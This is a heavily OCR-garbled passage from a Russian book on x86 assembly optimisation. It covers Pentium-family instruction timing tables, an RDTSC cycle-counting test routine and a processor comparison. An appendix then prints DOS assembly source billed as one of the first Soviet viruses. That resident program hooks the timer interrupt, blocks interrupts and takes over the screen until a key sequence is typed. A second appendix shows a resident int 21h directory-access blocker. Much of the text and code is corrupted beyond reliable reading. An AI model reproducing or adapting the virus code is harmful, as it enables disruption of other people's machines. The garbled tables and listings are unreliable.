астма я | Такты: указанные значения являются минимальными. Промахи кэша, невыравн 

СЕ 5Т1 [69| пр ность, ненормальные операнды и исключения могут значительно увеличить количес 

1005 И БОИ пр требуемых для выполнений тактов. 

ВЕР 1005 | 1439 | РатабИИу: + - рагаЫе ми! ЕХСН, пр = по рана е м ЕХСН. 

$0 ООО ПЕНИ пр Спариваемость: + - спариваемо с ЕХСН, пр - не спариваемо с ЕХСН. 

ВЕР 570$ Г [9 | пр гоу: пересечение времени выполнения с целочисленными инструкциями. 1-оу - 4 03 
Чает, что последние четыре такта могут пересекаться с последующими целочисленнь 

м0у5 4 т инструкциями. 

ВЕР МОУ [9 [в 

58 А 

НЕР(МЕ 5САЗ [99 | № 


т == 
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ры 482 ван вии ии ино в о попов во явное внв ние» О о ПАР 
| ООО ВОНИ 
| ‚ пересечение времени выполнения с инструкциями ЕРО. Ер-оу -2 О РИ С Что Инструкц ранд р р ив 
| троу: пер могут пересекаться с последующими инструкциями АТ ЕБСАЕЕ ОИ ВЕ ОИ ВОИНА о 
ое а тот мост перен И ПОНИ ОЕ ОИ ОИ ИСИ ОВО 
| | здесь считается как инструкция . БОТ ов | 69 0) 2 
| - РТиР 
| Таблица 6.9. Время выполнения инструкцив ЕРУ. Процессоры РТ и РММХ РТМ ГС05 1 65-1009 | 2 
| ях О МОИ ПЕСО ОИ ИЗО ВЕ 
| [олеанд | мы | Спариваемоть — [509 | бо РМ 
| Я РЗ ООО ПОР ПОВ ИС Е2ХМ1 в [2 2 
| п И ОЕ ОИ ОИ ИСИ ИС Е О ЕТ О ООО ОЕ 
| ыы Я ИВ ИИ О ООО ОИ ОСИ ВЕ ИИ ИЕ 
р = О ОИ ИИ ОИ МООИ МЕТ ИИ ИЕ ВИА 
| 1 
Ё ВТР [о И ОНИ ПЕСЕН ЕВА ВЕ 
| 
Ё ЕР) ттза/т ООО ИСО ИС ГОР р [о 
| Рю | 
| БТ о сн О ОИ ОСИ ОСИ ИС 
| ово [мал | 
т ПИ ЕЕ т 
о К НИ И ты 
ТО И. О О С ЕЕ и И 
2 Г | РНЕ ТИ о 
ОТО ОИ ПЕ : 5 
ОТО СОНИ Е НИК ОО И ТЕ ИСИ ИСО 
УЕ ОС ООО ЗО ОИ ООО ОИ ИВ ИС 
о я С ИСИ 
ОО ИИ ИСО ИОВ И ИИ ПЕ ОИ СИ И 
| АТОМ и И 5 АТ [9 [0 
3 
| т О И ВЕ Примечания | 
| РОВ(К)(Р) ит ПЕ ПОНИ ПЕЗОИНИ 2 п) значение, которое нужно сохранить, должно быть готово на один такт раньше; 
НИ ЕМОКР) ПРИ 38 0) 2 п) 1, если пересекающаяся инструкция, тоже что и ЕМОЕ: 
| ЕЕ | 
| РО/(В)(Р) РА СИИ 0 0) не может пересекаться с инструкциями целочисленного умножения; 
| | ‘ЕСН РАВ И ПЕЙ р) ЕБГУ занимает 19, 33 или 39 тактов для 24-, 53- и 64-битной точности соответст- 
| а РИ О ИИ 0 венно. РГОГУ занимает на 3 такта больше. Точность задается битами $ — 9 контрольного 
| но ВИ И И ОЕ ИЕ о РО, 
ЕАО ЕТ5ИВ(В) ее 2 Г) такты типичны. Тривиальные случаи могут быть быстрее, нетривиальные — медленнее; 
| АМИ И 2 3) может быть на 3 такта больше, когда требуется выходной результат ЕТ, ЕСН$ или ЕАВ6. 
Ор |, 
| ЕЕСОМ ЕЯ ПЕНИ К [о 28.3. Инструкции ММХ (РММХ) . 
| | 
| РТТ ОЕОЕТОИИ И ОВИИ ПРЗИИ о Список периодов выполнения инструкций ММХ приводить нет необходимости, посколь- 
| Е Я ИИ ЕВ 2 У они все занимают один такт, кроме инструкций умножения ММХ, которые занимают три 
| ЕРВЕМ ИИ 16- ПЕ ПЕЗОНИИ 2 - Время выполнения инструкций умножения ММХ может пересекаться и конвейеризи- 
| ЕРВЕМ1 [1200 п [0 РОватьс 
| МОТ О ВЕТ НИИ 


я, поэтому можно добиться производительности в одно умножение за такт. 


6% 
| 
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Инструкция ЕММ$ занимает только один такт, но первая инструкция ЕРУ после 
ЕММ$ занимает примерно на 58 тактов больше, а первая инструкция ММХ после инст 
рукции ЕРИ занимает примерно на 38 тактов больше. 

Нет потерь при использовании операндов памяти в инструкции ММХ, потому что 
арифметический модуль ММХ находится на один шаг дальше по конвейеру, чем модуль 
загрузки. Но потери будут, когда нужно будет сохранять данные из регистра ММХ в па- 
мять или в 32-битный регистр: данные должны быть готовы на один такт раньше. Это 
аналогично инструкциям ЕРЦ. Все инструкции ММХ, кроме ЕММ$, спариваются в лю- 
бом конвейере. Правила спаривания для инструкций ММХ объяснены в разделе 6.10. 


6.29. Список периодов выполнения инструкций 
и задержек микроопераций для РРго, Р2 и РЗ 


Пояснения 

Операнды: г — регистр, т — память, 1 - число, зг — сегментный регистр, т32 -— 32- 
битный операнд в памяти ит. д. 

Микрооперации: количество микроопераций, которые генерирует инструкция для 
каждого порта выполнения: 


# ро: порт0: АБД ит.д. 

# р!: порт 1: АБО, переходы 

ро: инструкции, которые могут попасть как в порт 0, так и в порт 1 (какой будет сво- 
боден первым) у 

& р2: порт 2: загрузка данных и т.д. 

Ш р3: порт 3: генерация адреса для сохранения 

р4: порт 4: сохранение данных 


Задержка — задержка, которую генерирует инструкция в цепочке зависимости. Это не 
то же самое, что время, потраченное в модуле выполнения. Значения могут быть неточ- 
ны в тех ситуациях, когда они не могут быть достоверно измерены, особенно, что каса- 
ется операндов из памяти. Значения являются минимальными. Промахи кэша, невырав- 
ненность и исключения могут повысить количество тактов весьма значительно. 
Предполагается, что операнды с плавающей запятой являются нормальными. Ненор- 
мальные числа, МАМ и бесконечность увеличивают задержку на 50-150 тактов, кроме 
пересылок ХММ, перемешиваний и булевых инструкций. Переполнения ЕРЦ, потеря 
значимости, ненормальные или МАМ-результаты дают аналогичную задержку. 

Производительность — максимальная производительность нескольких инструкций оД" 
ного вида. Например; производительность в 1/2 для ЕМА1, означает, что новая инструк” 
ция ЕМОЕ может начинать выполнение каждые 2 такта. 











6.29.1 Целочисленные инструкции (РРго, Р2 и РЗ) 


Таблица 6.10. Время выполнения инструкциб. Процессоры РРго, Р2 ир 
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ВЕР $105 1 || | | Таблица 6.11. Время выполнения инструкций ЕРУ. Процессоры РРго, Р2 и 
м0у5 ОО И ВИ ПЕНИ ВЕ ВЕ О ИИ . 
Е ОО ОИ И ЗСЗ НО О ООО 
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5САЗ ОИ И ПИ Е ВЕ И В ПОНИ = я 5 5 
ВЕРКМЕ СА | Е = п | ра | а | | 4 ы а 
СМР5 ОО ПО ПО ПО ПЕ ПО ПО ПО Б НЗ о а 
ВЕРЕ СМ || = 5 ы Н 
ВАР ОО ПО О ПЕН ПО ПО ОИ ПО = 
о НИ И О И О О И ИИ || | 
№ Я 
й ТС ПО ПЕ ПО ООО МООА ПО ПО ООО Но ОО ВРЗООИ ПООО ООО ПО ПОЗООО УООО ПОООО 
тн 1 50° | ЕО ОЕ ВЕ ЗОВИ ОИ ООО Е-ЗАИИ ОООО ООО ПООООИИ 
оит 1 530 | ЕТ) ОЕ БЕЗ ООО ООО ООО ОО ИО ПОНИ 
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и С ОЗ О ПО ОО ООО ВОИ 
с) 3, если константа без базового или индексного регистра; е 
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МТС т16 | 
РАОБ{Р) 
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В 29) 
КМ [56 [| 29) 
РР 38 [1/37 
КМВ | 38% [| 13 
АВЗ ОО И И И О ПО ООО ООО 
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Е С О С О 
НЗУВ(К) 

О О С О О ОЗ О ОО О 
О С ОО О О ЗО ОО ПО ПИ 
2 ООО ЗО О ОО ОЗ О ОО ПИ 
О ОО ЗО О ОО О О ОО ПЗ 
В О О О О О О ПО ВЕ 
С ОИ А ПО ПО О О О ПОНИ 
мен РЕ 
О ООО О О ООО ОО О О ПО 
ТЗ ООО ОО ОО О О О О ОИ 
ОО Е ОО ОО О О О ОИ 
т ОО ЗО О О О О ОО ОСИ 
р. 
о ОИ А И ОИ О И 

п Г [= 
О О О О О ВИ 
пы р [= 
И ПО ОСТ О О О О ПО ОИ 
ЕМСУТР 

О О О О ОО О О ОО ОИ 
ЗО О ОИ ОО ОО ОО О ОО ПОНИ 
О ОО ООО ЕО ООО О О ООО ОИ 


е1) 
е) 
е) 
е) 
е) 
е) 
е) 
е) 







р 


— РА5ТОВ 
МАН 


Примечания 


е) не конвейеризуется; 

Е) ЕХСН генерирует 1 микрооперацию, что делается с помощью переименован! 
регистром, порты при этом не задействуются; 

2) ЕМ. использует ту же схему, что и целочисленное умножение. Поэтому комб 
нированная производительность целочисленных умножений и умножений ЕРИ равна 
ЕМОГ + 1 МОЕ за 3 такта; 

В) задержка ЕБГУ зависит от заданной в контрольном слове точности: 64 бита да 
задержку в 38 тактов, 53 - в 32 такта, 24 - в 18. Деление на степень от двух занимает 
тактов. Производительность равна 1/(задержка-1); 

1) быстрее для низкой точности. 


6.29.3 Инструкции ММХ (Р2 и РЗ) 


Таблица 6.12. Время выполнения инструкций ММХ. Процессоры Р2 и | 
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МО\АРУ п128,1128 


— 
— 
- 


МО\ИР5 1128, т128 


О Е о о и в 6.29.4. Инструкции ХММ (РЗ) 
РУКА Р5В 
РЫВА РУВЕ РН [16464 | 1 
РАСК РИМРСК [16464 | 
РАСК РИМРСК 1 16464 | [О Таблица 6.13 «Время выполнения инструкций ХММ. Процесе 
ЕММ5 | 
30- 
РмОММ$КВ 94) | 3264 | И = . : 
30- р. 
АВЕ ИИ ие ЗВ: Е 
5. 
РНИИ 4 О ОИ ПОТ ПО О ПН ПО ПЕЧИ т 1 Е Е ‹ Е ё 
О ОО ОО О ОО ОО ОО ОИ ПИ ПОШИВУ ЗЕЕ: 
РЕХТКУ 4 ве |1 | 
РАБК\ 4 64а рб 
РАЗВ\ 4 ООО: УТС ООО ОЕ ПО ОЕ ПО ООО ОЕ АНИ ПОЕТ МОУАР$ |1 
4 764,764 1 
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О ВИ ОВ ВИ О О О И И ИИ ны 
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И Е О ОО О И И ОО ИЕ нони | 28 Е 
Примечания ОИ ВО В ВО ПО ВЕ ПЕ ПИ 
9) только РЗ; пы |2 | 
19) Можно скрыть задержку, вставив другие инструкции между ЕММ$ и последую" т в Е ; 
пм инотрукшями ЕР В И О О О О И И И 
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| [| ивыта | |8] || Ш С ЕЕ ОСТ ОИ ОО ОИ О МООИ ПЕНИ ИУ 
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2 


ХОВРЗ 11281128 
1128128 


6.30. Тестирование скорости 


Е 
ЕЕ 
— 
ж 
и >< 
п 
|. 
г 
|-|- 
> 
— 
р 


|. 


МАХР5 128,128 2 1/2 я ; в 
МТМР5 г128, У микропроцессоров семейства Репнит есть встроенный 64-х битный счетчик, кото 
ИА 128.128 пи |3 1 можно считывать в ЕОХ:ЕАХ, используя инструкцию ВОТ$С (теа@ бте затр сойиет). 
115 инструкция очень полезна для того, чтобы точно узнать, сколько тактов занял кусок кода. 
тс 7128,32 и |3 1/1 Программа ниже полезна для измерения количества тактов, которое занимает | 





МРеср5 128.128 2 [|| | 1/2 Программа выполняет код 10 раз и сохраняет 10 значений счетчика. Программу мо: 

пол - - 
СМРЕЕР5 128 1128 | 2 |2 |3. 1/2 ьзовать как в 16-ти, так и в 32-х битном режиме наР1 иРММХ. 

* 
3 1/1 

без [ие | ар ЕВ 60010 , количество повторений 
1(0м155 ВОТ$С МАСВО ; определяем инструкцию ВОТ$С 

ЕМОМ 

бМ 
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СООМТЕВ ОО 0 ; счетчик цикла 

Т1С$ 20 0 ; временная переменная для счетчика 
ВЕЗОЬТЬТЗТ 00 ТТЕВ БОР (0) ; список тестовых результатов 

} ХЕЖХЖЖХЖЖЖКЖХ Соде 5едмепе : ЖАЖЖЖХЖЖАКХХХХКХ хх 
. СОБЕ ; сегмент кода 

ВЕСТМ; МОУ { СООМТЕВ] , 0 ; Сбрасываем счетчик цикла 

ТЕЗТЬООР: ; тестовый цикл 


}КЕЖЖЖЖяЖХ 


РЕМ Т 


! 
Делаем здесь необходимую инициализацию' ХХХ кКкх 


} ХУЖЖЖЯЖЖЖКЖКХ Конец инициализиции ХХХ ххх 
ВОТ$С ; считываем значение счетчика тактов 
МОУ [110С51,ЕАХ ; сохраняем его 
СЬО ; не спариваемая инструкция 
ВЕРТ 8 
МОР‘ ; 8 МОР'ов, чтобы избежать "затенения" 
ЕМОМ 
;*** Поместите здесь инструкции, которые нужно протестировать; *** 
ЕЬОРТ ; это всего лишь пример 
ЕООВТ | 
ВСВ ЕВХ, 10 
ЕОТР 5Т 
ужжяххяя» Конец инструкций, которые нужно тестировать *ж*жххяжжяххя 
СС ; Инструкция против спаривания и затенения 
ВОТЬС ; снова читаем счетчик 
ЗОВ ВАХ, [ТТС$5] ; вычисляем разность 
ЗОВ БАХ, ОУЕВНЕАО ; вычитаем такты, которые использовал;. 
; подсобные инструкции (против спаривания 
; И затенения} 
МОУ ЕОХ, [СООМТЕВ] ; счетчик цикла 
МОУ [8Е50Ь7ТЬ1$1] [ЕБХ] , ЕАХ ; сохраняем результат в таблице 
АО ЕОХ, ТУРЕ ВЕЗОЬТЬТЗТ ; увеличиваем значение счетчика 
МОУ [СООМТЕВ], ЕБХ ; сохраняем счетчик 
СМР ЕБХ,ТТЕВ * (ТУРЕ ВЕЗОЬТЬТ5Т)} 
В ТЕЗТЬООР ; повторяем заданное число раз 


; вставьте здесь код, чтобы считать значения в ВЕЗОЪТЬТЕТ 


Дополнительные инструкции до и после тестируемого кода включены, чтобы полу- 
чить адекватные результаты на Р1. СТО - это неспариваемая инструкция, которая была 
добавлена, чтобы порядок спаривания инструкций в первый раз был такой же, как и во 
все остальные. Восемь инструкций МОР были вставлены, чтобы предотвратить влияние 
возможных префиксов в тестируемом коде, которые могли бы раскодироваться в тени 
предыдущих инструкций на Р1. Однобайтовые инструкции использовались здесь, чтобы 
получить тот же порядок спаривания. 

На РММХ еще можно вставить 'ХОК ЕАХ,ЕАХ / СРОШ перед тестируемым кодом, 
чтобы ЕГЕО-буфер инструкций был очищен, или какую-нибудь длительную инструкцию 
(например, СГ] или ААО), если нужно, чтобы он был полон (СРОГО не вызывает эффек 
та затенения — может начаться раскодировка префиксов последующих инструкций). 
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На РРго, Р2 и РЗ можно добавить 'ХОК ЕАХ.ЕАХ / СРИШГ до и после каж 
ЕОТ$С, чтобы предотвратить ее возможное выполнение параллельно с какой-ниб 
другой инструкцией и убрать подсобные инструкции. СРОШ — это синхронизирую 
инструкция, это означает, что она очищает конвейер и ждет, пока все исполняющи 


инструкции не будут выполнены, и только тогда выполнится сама. Это может быть. 
лезно для тестирования. 


Инструкция ВОТ$С не может ВЫПОЛНЯТЬСЯ В ВИ 
поэтому при запуске РО$-программ, сле 

Полный текст исходного 
Вир://му\у\ арпег.оге/аззету/. 


У процессоров Репйит есть специальные счетчики наблюдения за качеством рабо 
которые отслеживают и подсчитывают такие события, как промахи кэша, невыравн 
ность, различные задержки. Подробности об использовании счетчиков в данной главе 


затрагиваются, но их можно найти в "Пие| АгсЬиесваге ЗоЙ\уаге Реуеюрег$ Мапиа|". \ 
3, Аррепах А. ’ 


ртуальном режиме на Р1 и РМ 
дует перегрузиться в реальный режим. 


кода тестовой программы доступен по адр 


6.31. Сравнение различных микропроцессоров 


В табл. 6.14 изложены некоторые важные различия между процессорами семейства РЕП 
Таблица 6.14. Основные поколения семейства процессоров Реп 
РРМмх [Рю | РЗ 
кэш кода, кб 


кэш данных, кб 


> 
©^ 


Г 
[2 
> |-> 
с“ | ^^ 
на | +5 
а“ | ©^ 


встроенный кэш 2 уровня, кб 
инструкции ММХ 
инструкции ХММ 


|= 
ФФ 
+ 
т 
ФФ 
+ 
= 
2 


ФФ 
+ 
= 
ФФ 
= 
т 
ФФ 
= 


нет да 


инструкции условной пересылки нет не [№ | да 
выполнение не по порядку нет нет а [№ | да 
количестов элементво в буфере 256 256. 512 512 512 
предсказывания переходов ОО ПО ПО ПОНИ 

размер стекового буфера 4 16 

к 16 16 
озвращений | 

Потери при неправильном 3-4 4-5 10-20 10-20 10-20 
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| аш | В роцессоров оеместа Рени 


задержки чтения регистров дополнительных инструкций ЕХСН. Это тормозит выполнение на "старых" проце 
время ожидания ЕМИ. но не на процессорах семейства Репбит и продвинутых неинтеловских процессорах 


| | | производительность ЕМИЕ #_ Использование инструкций ММХ на пронессорах РММХ, Р2 и РЗ или инструкций у 

время ожидания ТМИЕ пересылки данных на РРго, Р2 и РЗ создает проблемы периносимости с более ра: 

| производительность ТМ. цессорами. Решение может состоять в написании нескольких версий кода, каждая и: 

рых будет оптимизированна под определенное поколение. Программа должна определ 
каком процессоре она выполняется и выбирать соответствующую версию (п. 6.27.10). 


предсказании перехода и Использование инструкций ЕРИ на Р1 и РММХ часто требует большого коли 
| 








*) Саегоп: 0-128, Хеоп: 512 или больше, доступны другие варианты. На некоторых 
версиях кэш второго уровня выполняется на половинной скорости. 
и Большая часть методов оптимизации быстродействия исполняемого кода, обсу 


шихся в этой главе, имеет ценность и для других микропроцессоров, включая и 
и Размер кэша кода важен, если критические части программы занимают достаточно лия других производителей, не только Пие!. 
много места. 


Комментарии к таблице 


& Размер кэша данных важен для всех программ, которые обрабатывают большое 
количество данных в критической части. 


и Инструкции ММХ и ХММ полезны для тех программ, которые обрабатывают боль- 


шие массивы данных, такие как звук и изображения. Не всегда от использования 
инструкций ММХ и ХММ можно получить выгоду. 


= Инструкции условной пересылки данных полезны для того, чтобы избавиться от пло- : 
хо предсказуемых условных переходов. 
# Выполнение не по порядку улучшает качество (особенно не оптимизированного кода). 
Оно включает в себя автоматическую перегруппировку и переименование регистров. 
@ Процессоры с хорошим механизмом предсказания переходов могут предсказывать 
простые повторяющиеся последовательности. Чем выше потери при неправильном 
предсказании переходов, тем важнее их предсказуемость. 


 Стековый буфер возвратов улучшает предсказание инструкций возврата из подпро- 
грамм, когда они вызываются из нескольких мест. 


# Задержки чтения регистров делают обработку смешанных типов данных (8, 16, 32 
битов) более сложной. 





# Время ожидания инструкции умножения зависит от цепочки зависимостей. Произво- 
дительность 1/2 значит, что инструкция может конвейеризироваться, поэтому новое 
умножение может начинаться каждый второй такт. Это определяет скорость парал“ 
лельной обработки данных. 


= Использование инструкций ЕРО на Р1 и РММХ часто требует большого количества 
дополнительных инструкций ЕХСН. Это тормозит выполнение на "старых" процессорах 
но не на процессорах семейства РепНит и продвинутых неинтеловских процессорах. 

= Использование инструкций ММХ на процессорах РММХ, Р2 и РЗ или инструкций условной 


пересылки данных на РРго, Р2 и РЗ создает проблемы периносимости с более ранними ПР 
цессорами. Решение может состоять в написании нескольких версий кода, каждая из кото" 
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Зир РМОВР РТВ сз: [019 22] 


; Переход к старому обработчику 
; Вовый обработчик прерывания таймера 081 


. Приложение 1 
| Вариант реализации одного 
| из первых советских вирусов 


рем_081: 
с1а 
; Сохранение "старого" адреса стека, установка собственного стека 


поу МОВО РТВ сз: [014 р], зр 
В ; ПоУ МОВО РТВ сз: [01455], $5 
н. ; хсра ах, зр 
|| ; В определенное время блокируется система прерываний, поУ ах, с$ 
Ви ; очищается экран и в его центр выводится сообщение === поу $5, ах 
На ; "Хочу Чучу!". Восстановление экрана и снятие блокировки хсН9 ах, зр 
; прерываний происходит только после ввода оу $р, пем_зр 
; с клавиатуры последовательности символов "ЧУЧА". ; Сохранение используемых регистров 
; разн ах сх $51 41 еб 45 
. 286 ; Чтение текущего времени из СМ0$ 
. МОБЕЬ ту оу а], 
. СОПЕ оп 708, а1 
а1агщ ЕО0 21455 ; Время активизации 11 а1, 711 ; Читаем минуты 
о1а_2Е1 Еб0 ОРЕЗЕТ зфатё ; Адрес старого ВН 2РВ ие с1, а1 
019 08в #90 ОРЕЗЕТ 5 агЕ+4 оу а1, 4 
„ ; Адрес старого ВИ 08. оцЕ 70, а] 
014 $5 ЕО0 ОЕЕЗЕТ зЕагё+8 - 11 а], 711 ; Читаем часы 
= ; Адрес для хранения "старого" $$ оу СБ, а] 
©19_5 ЕО0 ОЕЕЗЕТ 56агё+10 сир сх, а1атт ; В 
(о р ; Адрес для хранения "старого" 5Р 902 ех1ЕЕ1те роверим время активизации 
пем р ЕО0 ОРЕЗЕТ 115% ; Новый адрес 5Р поу а1, 801 ; Запретим немаскируемое 
ЕтрБаЕ Е00 ОРЕЗЕТ 115 ; Адрес временного видеобуфера о0Е 701, а] ; прерывание 
, ее 100% т а1, 711 ; и проверим 
Беа1п: ог а1, а] ; секунды текущего 
Эр 5саге ; Перейдем е загрузчик 307 ех1Е1те; времени на ноль 
; Скен-коды нажатия и отжатия клавиш Х, Е, Х, Г (ЧУЧА с11 























; Запретим прерывания 


раз5ма ОВ 205, ОАВ, 128, 926,205, я, 211, ОА, 0 ; Сохраним текстовый видеобуфер 
; Упакованное сообщение, выводимое при активизации рузВ с5 
в агримез ОВ 4,2, 3,2, 3, 4, 32,2, 2, рузВ 08800 
‚| ОВ 2, 2,6, 2,2, 2,2, 2,2, 2 рор 95 
ы ОВ 22,2, 2, 2,22, 2,3, 24,9 рор е5 
й ОВ 21,2, 3, 2,2, 2,24, 24, 2,2 хог $1, 51 
В ОВ 2, 2,2,2,62,2,2, 2,2, 2 поу 91, ЕирьаЕ 
‚| ОВ 222,212, 2, 2, 2, ‚2 пОУ сх, 2000 
НН ОВ 10,3, 4, 2,2, 2, 3, 5, 3, 5, 7 тер ет 
ОВ 5, 3,5, 3,5, 3, 5, 3, 2, 9, 2 ; Очистим видеобуфер 
ОВ 1, 2,3, 2,2, 2, 6,2, 6, 2, 10 оу сх, 2000 
ОВ 2,6, 2,6, 2, 6, 2, 13, 2, 3,2, оу ах, 07208 
ь ОВ 3,4, 71, 2, 3, 4, 11,2, 2,5, 7 разв 95 
И: ОВ 22,5, 4, 2, 0 рор ез 
; Строка, выводимая при запуске ХоГ 91, 91 
{хепе5 ОВ 'ЧУЧА', 00Ь, ОАВ, ' $605 
ОВ (с) 01ед У. ВигЧаеу, 2000', Орь, бАВ, '$' ; Выведем сообщение 
Н ; Новый обработчик мультиплексного прерывания 2ЕЪ - рузВ С5 
Е ; проверка наличия в памяти первой копии программы рор 95 
| пем_2Ёп: оу 41, 1600 
в сир ан, ОЕЗН поу $1, ОРЕЗЕТ дерртез 
| Эпе очЕ2ЕЬ поУ ах, О7ОВЬ 
: поу а1, ОЕРЬ; Признак присутствия О ез: 
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ооо ово соя повис по вии о ие т оз восооо ооо вова совооо ров Во Ба ооовоовавиаана оо со ово панос ооо вич ино сооовооносоо сова пеооооооооотонаевь» и 


тер 


теепеег: 


пехе; 


тезфоге: 
$61 ^ 


гер 10054 
ех1ЕЕ1ше: 


оу 
ог 

72 
хог 
5605м 
1пс 
Зир 


с1, ВУТЕ РТВ [$1] 
с1, с] 

теепфег 

а1, ОРВЬ 


$1 
оц тез 


; Ожидаем ввода с клавиатуры ключевой последовательности 


поУ 


пр 


31, ОРЕЗЕТ раз5ма 


ВУТЕ РТВ [$1], 0 

тезкоге 

ай, а1 

а1, 601 ; Читаем из порта 

а1, ан ; клавиатуры, пока 
пехЕ ; не будет изменений 
а1, [51]; Сравним считанный код с кодом 
теепеег ; ключевой последовательности 
$1 

пех 


; Восстановим видеобуфер и разрешим прерывания 


ОУ 
хот 
оу 


хог 
[о \ы 


$1, (ирраЕ 
91, 91 
сх, 2000 


а], а1 
70Н, а] 


; Восстановим сохраненные регистры 


рор 


4$ ез 91 $1 сх ах’. 


; Восстановим стек 


оу 
поу 


$5, ИОВ РТВ с; [019 $5] 
зр, МОКР РТВ с$: [014 $р] 


; Перейдем на старый обработчик прерывания от таймера 


Эшр 


ОИОВР РТВ с$; [01а 081] 


; Загрузчик резидентной части программы 


5Фаге: 


ав, ОЕЗ\; Проверим, не находится 

2 ; ли уже эта программа 
а1, ОРЕН; в памяти 

1056 


; Загрузка - сохранение "старых" и установка "новых" ВП, 
; вывод сообщения и завершение программы с оставлением 
; в памяти 5К 


поу 
1% 
поу 
поу 
ед 
10 
поу 
оу 
оу 
поу 
рузЬ 


рор 


ах, З52ЕВ 

211 

МОВР РТВ с$: [01а 211], Ьх 
МОВР РТВ сз: [014`2Ё1+2], ез 
ах, З508Н 

211 

МОВР РТВ сз: [©14_081], 5х 
МОВР РТВ сз: [©149_081+2], ез 
ах, 25226 

4х, ОРЕЗЕТ пем 2 

С5 = 

95 





у 
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следующе 


ОЧчУ чУчУуи 


то сообщение хранится в программе в запакованном виде 
по адресу дтрипез, каждое значение соответствует количеству 


17 218 
поу ах, 25081 
поу Чх, ОЕЕЗЕТ пен 08® 
ризВ с5 = 
рор 95 
пе 218 
поу ах, ОРЕЗЕТ Ех(пез 
поу ар, 091 
10 211 
поу Чх, 1400. 
10 278 
; Завершим программу 
1150; , 
116 20% 
ЕМО Бед1п 
; Примечания. 
; 1) Сохраняемые вектора прерываний записываются поверх уже 
; выполненного кода загрузчика. 
; 2) В памяти после загрузки остаются 5Кб, 4 из которых необходимы 
; для сохранения содержимого видеобуфера при активизации 
; программы. 
; 3) При совпадении текущего времени с установленным считывается 
; дополнительно текущее значение секунд и одновременно 
; запрещается немаскируемое прерывание. 
; Дополнительный анализ значения секунд позволяет избежать 
; повторной активизации программы после ввода кодовой 
; последовательности - выполнение продолжается только в случае 
; равенства секунд нулю, иначе происходит переход 
; на метку ех1 ЕЕ 1ше. 
; 4) После активизации программы распаковщик формирует сообщение 
р 
; 
# 
; 
; 
1 
; 


поочередно выводимых символов пробела или полного заполнения. 
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ето ово воно о ино а нано сонно» {ооо пи пав ван оао ао но ооо вор ооо ооо воовоа ия оч ооо ооо вони чо вооон а вова о воть ва вваоожонивеньвьюс, 


Приложение 2 поу ав, 095 


; Вывод сообщения об успешной установке 


Резидентный блокировщик пох @, ОРЕЗЕТ 19159 


170 21. 
| у : ; Завершение и оставление резидентной части объемом 1 Кб 


доступа к директории поу 4х, 10008 








116 278 

1085: 

; Вывод сообщения о выгрузке 
поу ап, 098 





91:1осК.азт - резидентный блокировщи: 








; . == == поу 4х, ОГЕЗЕТ гепиза 
| доступа к директории оу 9х, 
| . 386 Зир ех1 + 
| . МОБЕЬ пу изаде: 
. СОРЕ . ; Вывод информации об использовании 
ОВС 100% поу ар, 095 
| Бед1пт: поу Ах, ОРЕЗЕТ изетз9 
| | цоу — ах, ОРЕЗЕТ сЕ1ЧВЕ$ | те 2 
и‘ ет ав, 098 ех1: 
11 218 ; Завершение программы 
|. поу ар, ОЕЗ ; Проверка поУ ах, 4С00% 
10Е 2 ; наличия 10 215 
сир а1, ОЕРЬ ; резидентной части ; Обработчик прерывания 2РВ - выгрузка 
ТИ 32 1156 ; Уже в памяти - на выход пем_2Ё8: 
и спр ВУТЕ РТВ сз: [801], 0 сир ар, ОЕ 
й )1 узаде ; Команцная строка пуста - на выход )пе о2Ь 
| `; Перевод парамеров командной строки к верхнему регистру , разв 95 
| хог сх, сх разв е5 
| | ет с1, сз: [808] ризра 
НИ не 91, 81. оу ах, 25211 
В БоБ9: 195 Чх, с5: 014 211 
В спр ВУТЕ РТВ [91], 616 ;'а' | зп 218 
3ъе Ь19 р оу ах, 252ЕВ 
ап ВУТЕ РТВ {91], ООЕВ $; 'а' -> 'А' (618 -> 41) р 195 Чх, сз: 019 21 
Ь19: ь я 21 
| : пс 91 . поу ез, МОКР РТВ сз: 2св 
| 1оор сор1а оу ан, 49% 
; Сохранение векторов прерывания | ие 21 
оу ах, З52ЕВ ра5В С5 
106 218 рор ез 
поу МОВР РТЕК сз: о14 2Е1, Бх поу ап, 498 
ед МОВО РТВ сз: 014 2+2, ез 11 218 
оу ах, 35211 = рора 
1 21 рор е5 
поу МОВР РТВ сз: о14 218, Бх рор 95 
поу МОВР РТВ с5: 014 211+2, ез поу 21, ОЕ 
Ме ах, 252ЕЁ 7 ‚ ор 1кее 
; Установка новых векторов прерывания . . 
оу Чх, ОРЕЗЕТ сз: пем_ 28 . пр сз: 019 2 
ризв с5 = дес работчик прерывания 211 
Е ри стр ав, 39. ; Функция 00$ МКОВ ? 
поу ах, 25211 32 1211 ; Да, на новый обработчик # 
мо Чх, ОРЕЗЕТ сз: пем_218 стр ав, ЗАВ ; Функция 005 ВМОТВ ?. 
разВ с5 = 32 1211 ; Да, на новый обработчик 
рор 95 . сир ав, ЗВь ; Функция 00$ СНОВ ? 


ии 21. 32 1218 ; Да, на новый обработчик 
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сир ай, ЗС ; Функция 00$ СВЕАТЕ ? 

32 1215 ; Да, на новый обработчик 
сир ав, З0ь ; Функция 208 ОРЕМ ? 

32 1218 ; Да, на новый обработчик 
спр ан, 411 ; Функция 005 РЕБЕТЕ ? 

32 0218 ; Да, на новый обработчик 
стр ай, 43 ; Функция 00$ СНМОРВ ? 

32 0215 ; Да, на новый обработчик 
стр ан, АВЬ ; Функция 005 ЕХЕС ? 

32 1218 ; Да, на новый обработчик 


стр ап, 4ЕВ ; Функция 205$ ЕТМО ЕТВЯТ ? 


92 1218 ; Да, на новый обработчик 
о211: 
Зпр сз: 01а 218 ; Переход на старый обработчик 211 
п21Ъ: и ; 05:0Х - указатель на путь 
с1а 
разра ; Сохраним регистры 
. разЬ е5 
разЬ 95 
разв С5 
рор е5 
поу 41, ОЕЕЗЕТ сограЕВ 
поу 51, 4х 
сир ВУТЕ РТВ 9$: [$1+1], ';' 
; Проверим, указана ли спецификация диска 
92 201]раЕВ ; в пути (полный путь) 
оу ан, 191 ; Получим текущий диск 
и 218 
оу 91, а! 
пс 91 
а93 а], 'А' 
поу ан, ':' ; Сохраним спецификацию диска 
$5105м . ; в строке полного пути 
поу ап, 47 ; Добавим текущий каталог 
разВ 95 ; в строку полного пути 
разв С5 
рор 95 
Херд 51, 91 
106 218 
рор 95 
хср9 51, 91 
ие 41, ОЕЕЗЕТ сиграеВ 
; Установим указатель на конец 
хог ах, ах ; строки полного пути 
ПОУ сх, 67 
герпе зсазЬ 
ес 91 
